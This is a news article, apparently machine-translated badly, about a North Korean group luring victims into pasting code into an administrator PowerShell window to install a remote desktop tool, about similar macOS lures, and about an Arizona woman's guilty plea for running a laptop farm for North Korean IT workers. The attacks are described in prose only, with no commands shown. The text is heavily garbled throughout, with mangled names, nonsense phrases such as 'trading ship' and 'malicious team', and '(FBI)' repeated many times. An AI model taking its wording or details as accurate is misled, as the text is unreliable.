Actor threats associated with North Korea known as Kimas It was noted using the new tactic that provides for the deception of the PowerShell launch as an administrator, and then instruct them to install and run the malicious code provided by them.
“To perform this tactic, the actor threats is masked as an official of the South Korean government and over time creates a connection with the purpose before sending an email spear with pdf (SIC),”-intelligence group by Microsoft – Note In a series of messages divided into X.
To read the intended PDF document, the victims are convinced by pressing the URL containing steps to register their Windows system. The registration link urges them to launch the PowerShell as an administrator and copy/insert a displayed code fragment into the terminal and execute it.
In case the victim comes, the malicious code loads and sets the remote desktop tool based on the browser, as well as the certification file with a solid pin from the remote server.
“The code then sends the web -questioning for a remote server to register the victim’s device by using a downloaded certificate and PIN. This allows the actor to access the device and carry out data,” Microsoft said.
The technological giant stated that he had watched the use of this approach in limited attacks since January 2025, describing it as a retreat from an ordinary actor’s trading ship.
It is worth noting that Kimusuk is not the only North Korean hacking strategy. In December 2024 it was disclosed This threat associated with a contagious interview company reinforces users to copy and execute the malicious team on their Apple MacOS systems through the Terminal application to solve the intended problem with access to the camera and microphone through the web browser.
Such attacks, along with those who have taken the so -called Clickfix The method, which has been shot in recent months, is partly due to the fact that they are counting on the purpose of infection with their own machine, thereby bypassing security protection.
Arizona woman pleads guilty of managing a laptop farm for North Korean IT workers
Development comes when the US Department of Justice (DOJ) said a 48-year-old woman from Arizona pleaded guilty for role in false IT -Work scheme This allowed the North Korean subjects to get distant jobs in more than 300 US companies, presenting both US citizens and residents.
Activities received more than $ 17.1 million of illegal income Christina Marie Chapman And for North Korea with violation of international sanctions between October 2020 and October 2023, the department said.
“Chapman, an American citizen, agreed with foreign IT workers from October 2020 to October 2023 to steal the identity of US citizens and used these identities to apply for distant IT labor and, aside the scheme, submitted false documents to Department Department Department Unified Security “, Doj – Note.
“Chapman and her coconspirators have received jobs in hundreds of US companies, including Fortune 500, often through temporary personnel companies or other contract organizations.”
The accused, who was arrested in May 2024, was also accused of managing a laptop, conducting several laptops in her residence to create the impression that North Korean workers work within the country when they were founded in China and Russia and devoted with internal systems of companies.
“As a result of Chapman’s behavior and her conspirators, more than 300 US companies were touched upon, more than 70 US identities have compromised, more than 100 times the false information was transferred to DHS, and more than 70 American people had false tax commitments created in their name “,” Doj added.
Increasing the inspection of law enforcement has led to the escalation of the IT -working scheme, and reports of the excess of data.
“After detecting in the company’s networks, North Korean IT workers demanded the victims, holding stolen their own data and hostage code until the company complies with the requirements of the ransom,” the US Federal Bureau (FBI) (FBI) (FBI) (FBI) (FBI) (FBI) (FBI) (FBI) (FBI) (FBI) (FBI). ) – Note in consultation last month. “In some cases, North Korean IT workers have publicly released their own campaign victims.”